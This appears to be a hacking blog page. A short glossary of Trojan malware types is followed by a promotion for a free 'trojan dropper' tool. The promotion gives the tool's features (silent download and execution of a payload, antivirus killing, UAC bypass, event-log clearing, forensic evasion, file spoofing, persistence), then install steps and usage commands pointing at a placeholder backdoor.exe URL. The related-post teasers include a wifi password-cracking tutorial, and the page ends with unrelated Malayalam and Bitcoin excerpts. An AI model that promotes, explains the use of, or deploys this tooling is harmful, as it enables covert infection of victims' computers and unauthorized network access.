Skip to main content

Common Types Of Trojan Malware, From A to Z



Here’s a look at some of the most common types of Trojan malware, including their names and what they do on your computer:


Backdoor Trojan

━━━━━━━━━━━━━

This Trojan can create a “backdoor” on your computer. It lets an attacker access your computer and control it. Your data can be downloaded by a third party and stolen. Or more malware can be uploaded to your device.


Distributed Denial of Service (DDoS) attack Trojan

━━━━━━━━━━━━━

This Trojan performs DDoS attacks. The idea is to take down a network by flooding it with traffic. That traffic comes from your infected computer and others.


Downloader Trojan

━━━━━━━━━━━━━

This Trojan targets your already-infected computer. It downloads and installs new versions of malicious programs. These can include Trojans and adware.


Fake AV Trojan

━━━━━━━━━━━━━

This Trojan behaves like antivirus software, but demands money from you to detect and remove threats, whether they’re real or fake.


Game-thief Trojan

━━━━━━━━━━━━━

The losers here may be online gamers. This Trojan seeks to steal their account information.


Infostealer Trojan

━━━━━━━━━━━━━

As it sounds, this Trojan is after data on your infected computer.


Mailfinder Trojan

━━━━━━━━━━━━━

This Trojan seeks to steal the email addresses you’ve accumulated on your device.


Ransom Trojan

━━━━━━━━━━━━━

This Trojan seeks a ransom to undo damage it has done to your computer. This can include blocking your data or impairing your computer’s performance.


Remote Access Trojan

━━━━━━━━━━━━━

This Trojan can give an attacker full control over your computer via a remote network connection. Its uses include stealing your information or spying on you.


Rootkit Trojen

━━━━━━━━━━━━━

A rootkit aims to hide or obscure an object on your infected computer. The idea? To extend the time a malicious program runs on your device.


SMS Trojan

━━━━━━━━━━━━━

This type of Trojan infects your mobile device and can send and intercept text messages. Texts to premium-rate numbers can drive up your phone costs.


Trojan banker

━━━━━━━━━━━━━

This Trojan takes aim at your financial accounts. It’s designed to steal your account information for all the things you do online. That includes banking, credit card, and bill pay data.


Trojan IM

━━━━━━━━━━━━━

This Trojan targets instant messaging. It steals your logins and passwords on IM platforms.


That’s just a sample. There are a lot more.



🦑FREE  trojan dropper :


F E A T U R E S :


The executable size is smaller compared to other droppers generated the same way.


Download executable on target system and execute it silently..


Self destruct function so that the dropper will kill and delete itself after finishing it work


Escape disk forensics by making all the files dropper create and dropper also cleans its content before deletion


Clear event log after finishing.

+ Framework properties:


Works with Windows, Linux and now have OSX support 


Dr0p1t-Server feature (beta) so now you can work from browser See how to work with Dr0p1t-Server


Dr0p1t-Server have a scam option (beta) See how to work with Dr0p1t-Server


Find and kill antivirus before running the malware.


The ability to disable UAC.


The ability to run your malware as admin.


Full spoof by spoofing the file icon and extension to any thing you want.


ZIP files support so now you can compress your executable to zip file before uploading.


Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable


In running powershell scripts it can bypass execution policy

Using UPX to compress the dropper after creating it


Adding executable after downloading it to startup.


Adding executable after downloading it to task scheduler ( UAC not matters ).


Adding your file to powershell user profile so your file will be downloaded and ran every time powershell.exe run if it doesn't exist.


🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :


A) On Linux


1) git clone https://github.com/D4Vinci/Dr0p1t-Framework.git


2) chmod 777 -R Dr0p1t-Framework


3) cd Dr0p1t-Framework


4) sudo chmod +x install.sh


5) ./install.sh


6) python Dr0p1t.py


B) On Windows (After downloading ZIP and upzip it)


cd Dr0p1t-Framework-master


python -m pip install -r windows_requirements.txt


python Dr0p1t.py


TO USE :

./Dr0p1t.py Malware_Url [Options]

./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx

./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32

./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas

./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip

━━━━━━━━━━━━━

📲 @anandu_aman

Comments

Popular posts from this blog

How to hack wifi in Windows 7/8/8.1/10 without any software | using with cmd

How to Hack Wifi password using cmd Hello Friends, In this article we will share some tricks that can help you to hack wifi password using cmd. Youcan experiment these trick with your neighbors or friends. It’s not necessarily that this trick will work with every wifi because of upgraded hardware. But you can still try this crack with wifi having old modems or routers. 1: WEP: Wired Equivalent Privacy (WEP) is one of the widely used security key in wifi devices. It is also the oldest and most popular key and was added in 1999. WEP uses 128 bit and 256-bit encryption. With the help of this tutorial, you can easily get into 128-bit encryption and Hack WiFi password using CMD. 2: WAP and WAP2: Wi-Fi Protected Access is an another version of WiFi encryption and was first used in 2003. It uses the 256-bit encryption model and is tough to hack. WAP2 is an updated version of WAP and was introduced in 2006. Since then it has replaced WAP and is now been used mostly in offices and colleges w

സുമതിയെ കൊന്ന വളവ് | The real Story of Sumathi valavu

സുമതി വളവ്.. മൈലമൂട് സുമതിയെ കൊന്ന വളവ് എന്ന് കേട്ടാല്‍ കേള്‍ക്കുന്നവരുടെ മനസ്സ് അറിയാതൊന്ന് കിടുങ്ങുന്നകാലമുണ്ടായിരുന്നു .അത്ര കണ്ട് ഭയമാണ് ഈ സ്ഥലത്തെക്കുറിച്ച് നാട്ടുകാരുടെ മനസ്സില്‍ഒരു കാലത്ത് ഉണ്ടായിരുന്നത്. അറുപത് വര്‍ഷം മുമ്പ് കൊല ചെയ്ത സുമതിയെന്ന ഗര്‍ഭിണിയായ യുവതിയുടെ ആത്മാവ് ഗതി കിട്ടാതെ ഇവിടെ അലഞ്ഞ് തിരിഞ്ഞ് നടക്കുന്നുവെന്ന വിശ്വാസമാണ് ഭയത്തിന് കാരണം. തിരുവനന്തപുരം ജില്ലയില്‍ കല്ലറ പാലോട് റോഡില്‍ മൈലമൂട്ടില്‍ നിന്നും അര കിലോമീറ്റര്‍ ദൂരെ വനത്തിനുള്ളിലെ കൊടും വളവാണ് സുമതിയെ കൊന്ന വളവ് എന്ന സ്ഥലം. ഇവിടെ വച്ചാണ് സുമതി കൊല്ലപ്പെട്ടത്. വനപ്രദേശമായതിനാല്‍ സന്ധ്യ മയങ്ങുമ്പോള്‍ തന്നെ ഇരുട്ടിലാകുന്ന സ്ഥലമാണിത്. ഇടതിങ്ങി വളര്‍ന്ന് നില്‍ക്കുന്ന മരങ്ങളുള്ള റോഡില്‍ ഒരുവശം വലിയ ഗര്‍ത്തമാണ്.ഒപ്പം കാടിന്റെ വന്യമായ വിജനതയും. ഇതിനൊപ്പം പൊടിപ്പും തൊങ്ങലും വച്ച് പ്രചരിയ്കുന്ന കഥകള്‍ കൂടിയാകുമ്പോള്‍ എത്ര ധൈര്യശാലിയായാലും ഈ സ്ഥലത്തെത്തുമ്പോള്‍ സുമതിയുടെ പ്രേതത്തെക്കുറിച്ച് അറിയാതെയെങ്കിലും ഓര്‍ത്ത് പോകും.പ്രത്യേകിച്ചും രാത്രി കാലങ്ങളില്‍. സുമതി മരിച്ചിട്ട് ഇപ്പോള്‍ അറുപത് വര്‍ഷം കഴിഞ്ഞു. എന്നിട്ടു

A Beginner’s Guide to Getting Started with Bitcoin

A man looks for Bitcoin Oasis If you have heard about blockchain or cryptocurrency, then the term that initially comes to mind is Bitcoin . Launched 12 years ago, it was the late 2017 bull run that created a media frenzy that propelled Bitcoin into the mainstream and our modern day lexicon. Often labeled as the “original” cryptocurrency, Bitcoin has been the catalyst (directly and/or indirectly) behind many new innovations in the blockchain and digital asset space, most notably Ethereum and Monero . Shortly after the late 2017 bull run lost its steam, interest in these new technologies started to fade ― but here we are in 2021 with Bitcoin having risen like a phoenix from the ashes. As you would assume, an appetite for the blockchain and digital asset space has returned and now it is more important than ever that we understand what exactly is behind this unique asset, Bitcoin. This article is meant to be a guide for individuals who are new to cryptocurren